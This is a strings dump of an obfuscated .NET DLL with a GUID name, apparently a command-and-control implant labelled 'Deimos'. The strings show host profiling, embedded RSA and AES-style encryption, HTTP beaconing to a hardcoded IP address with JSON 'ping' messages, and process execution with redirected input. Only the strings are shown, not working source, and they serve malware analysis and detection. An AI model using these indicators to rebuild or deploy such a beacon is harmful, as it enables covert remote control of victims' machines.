!This program cannot be run in DOS mode.
`.rsrc
@.reloc
.,o
v4.0.30319
#Strings
<Module>
System.Runtime.CompilerServices
RuntimeCompatibilityAttribute
CompilationRelaxationsAttribute
SuppressIldasmAttribute
System
Attribute
Object
AttributeUsageAttribute
AttributeTargets
System.Runtime.InteropServices
ComVisibleAttribute
System.Threading
WaitCallback
CompilerGeneratedAttribute
ThreadStart
ThreadPool
QueueUserWorkItem
String
Thread
Console
WriteLine
InvalidCastException
System.Collections.Generic
Dictionary`2
get_Item
List`1
get_Count
get_Chars
IndexOf
Concat
get_Length
Replace
Double
Substring
ToLower
op_Equality
FormatException
System.Reflection
DefaultMemberAttribute
Enumerator
GetEnumerator
get_Current
MoveNext
IDisposable
Dispose
Activator
CreateInstance
BindingFlags
Binder
InvokeMember
Assembly
GetType
Func`2
Environment
get_MachineName
System.Security.Principal
WindowsIdentity
GetCurrent
System.Security.Claims
ClaimsIdentity
get_Name
System.Text
StringBuilder
System.Globalization
NumberStyles
Convert
ToChar
ToString
Append
IntPtr
RuntimeTypeHandle
GetTypeFromHandle
Marshal
SizeOf
OperatingSystem
Version
get_OSVersion
get_Version
get_Major
get_Minor
op_Inequality
get_ServicePack
WindowsPrincipal
WindowsBuiltInRole
IsInRole
Random
ToCharArray
IEnumerable`1
System.Linq
Enumerable
ToArray
GetEnvironmentVariable
System.IO
Directory
GetFiles
GetFileName
ReadAllText
WriteAllText
System.Security.Cryptography
ICryptoTransform
MemoryStream
CryptoStream
Create
SymmetricAlgorithm
set_BlockSize
set_Key
GenerateIV
CipherMode
set_Mode
get_Key
get_IV
CreateEncryptor
Stream
CryptoStreamMode
get_BlockSize
set_IV
CreateDecryptor
WriteByte
ReadByte
RNGCryptoServiceProvider
RSACryptoServiceProvider
RandomNumberGenerator
GetBytes
AsymmetricAlgorithm
FromXmlString
Encoding
get_ASCII
Buffer
BlockCopy
Encrypt
set_PersistKeyInCsp
System.Net
HttpWebRequest
WebResponse
WebException
HttpWebResponse
WebRequest
set_Method
set_Timeout
set_ReadWriteTimeout
ServicePoint
get_ServicePoint
set_Expect100Continue
GetRequestStream
GetResponse
GetResponseStream
CopyTo
get_Response
HttpStatusCode
get_StatusCode
get_UTF8
GetString
FromBase64String
System.Diagnostics
ProcessStartInfo
set_CreateNoWindow
set_UseShellExecute
set_RedirectStandardInput
Process
StreamWriter
get_StandardInput
TextWriter
ParamArrayAttribute
WriteAllBytes
5c4c5071-b74e-4e6e-aac5-9ed9109a41f4.dll
mscorlib
System.Core
DotfuscatorAttribute
Deimos
Interact
value__
5c4c5071-b74e-4e6e-aac5-9ed9109a41f4
WrapNonExceptionThrows
F=H?JG@FBEAOzKS
R!"#$%&
:0:0:6.3.0+8b29d6f4a2
_CorDllMain
mscoree.dll
sabcdefghijk
2lmnopqrstu
<RSAKeyValue><Modulus>pwD1BcV23BCJFGFoghoL1GcIFWTXE4tCGBzgd+tt+eQ/ddwjog9NanZ4IIld94Ja6xrFfb4j8tnXygokRqPO2QLv2cZg4ANS6O0aWxRoxxq0qc8FpqOT7tIa100y/x9KFx5zm756kreLnacrkPtc6plq4OeSP2GqnIV5Oy1yyEmxz3SP5/tbvNV5ckZhxngYwxiYTTDaLHW6B9U8/YfZw3HJosyx4WMRqioLwrcOBIhNtOm+DEKH1vSH2ig+X1e8yvf/GGHh/k6hzPGjV5u3zk8PabnolUd66G8vlMMiKKhRUP8lys6Z04JIF8oGiPGnHHzkXiaaYNjb0Q362ssiKQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
http://216.230.232.134
{}[]:,
-0123456789e+
-.0123456789e+
NT 3.51
NT 4.0
Windows
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_
userprofile
\APPDATA\ROAMING
uniq_hash
":"change_status","
","is_success":
{"action":"ping","
","pc_name":"
","os_name":"
","arch":"
","rights":"
","version":"
| ?","
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
5c4c5071-b74e-4e6e-aac5-9ed9109a41f4.dll
LegalCopyright
OriginalFilename
5c4c5071-b74e-4e6e-aac5-9ed9109a41f4.dll
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0